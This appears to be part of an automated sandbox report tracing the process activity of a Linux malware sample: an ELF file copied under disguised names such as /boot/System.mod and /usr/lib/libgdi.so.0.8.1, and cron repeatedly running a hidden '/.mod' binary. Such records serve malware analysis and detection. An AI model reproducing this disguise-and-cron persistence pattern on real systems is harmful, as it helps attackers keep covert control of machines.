                                                                          Path:/usr/bin/basename
                                                                          Arguments:basename /usr/sbin/service
                                                                          File size:39256 bytes
                                                                          MD5 hash:3283660e59f128df18bec9b96fbd4d41

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl --quiet is-active multi-user.target
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl list-unit-files --full --type=socket
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/service
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/sed
                                                                          Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
                                                                          File size:121288 bytes
                                                                          MD5 hash:885062561f66aa1d4af4c54b9e7cc81a

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:33
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl start cron.service
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:33
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/tmp/linux_arm6.elf
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:33
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/bin/systemctl
                                                                          Arguments:systemctl start crond.service
                                                                          File size:996584 bytes
                                                                          MD5 hash:4deddfb6741481f68aeac522cc26ff4b

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:17
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:17
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          File size:22760 bytes
                                                                          MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          Arguments:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                          File size:22760 bytes
                                                                          MD5 hash:3633b075f40283ec938a2a6a89671b0e

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:/boot/System.mod
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:18
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:/boot/System.mod
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:19
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:19
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:/boot/System.mod
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:19
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:19
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/boot/System.mod
                                                                          Arguments:/boot/System.mod
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/udisks2/udisksd
                                                                          Arguments:-
                                                                          File size:483056 bytes
                                                                          MD5 hash:1d7ae439cc3d82fa6b127671ce037a24

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:32
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/dumpe2fs
                                                                          Arguments:dumpe2fs -h /dev/dm-0
                                                                          File size:31112 bytes
                                                                          MD5 hash:5c66f7d8f7681a40562cf049ad4b72b4

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:33
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:03:33
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:/usr/sbin/cron -f
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:-
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:-
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:/bin/sh -c "/.mod "
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/.mod
                                                                          Arguments:/.mod
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/.mod
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:/usr/lib/libgdi.so.0.8.1
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:/usr/lib/libgdi.so.0.8.1
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:04:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:/usr/sbin/cron -f
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:05:01
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:-
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:-
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:/bin/sh -c "/.mod "
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/bin/sh
                                                                          Arguments:-
                                                                          File size:129816 bytes
                                                                          MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/.mod
                                                                          Arguments:/.mod
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/.mod
                                                                          Arguments:-
                                                                          File size:1183448 bytes
                                                                          MD5 hash:7063c3930affe123baecd3b340f1ad2c

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:/usr/lib/libgdi.so.0.8.1
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:-
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/libgdi.so.0.8.1
                                                                          Arguments:/usr/lib/libgdi.so.0.8.1
                                                                          File size:4956856 bytes
                                                                          MD5 hash:5ebfcae4fe2471fcc5695c2394773ff1

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/lib/systemd/systemd
                                                                          Arguments:-
                                                                          File size:1620224 bytes
                                                                          MD5 hash:9b2bec7092a40488108543f9334aab75

                                                                          Chronological Activities


                                                                          General

                                                                          Start time (UTC):18:05:02
                                                                          Start date (UTC):10/12/2024
                                                                          Path:/usr/sbin/cron
                                                                          Arguments:/usr/sbin/cron -f
                                                                          File size:55944 bytes
                                                                          MD5 hash:2c82564ff5cc862c89392b061c7fbd59

                                                                          Chronological Activities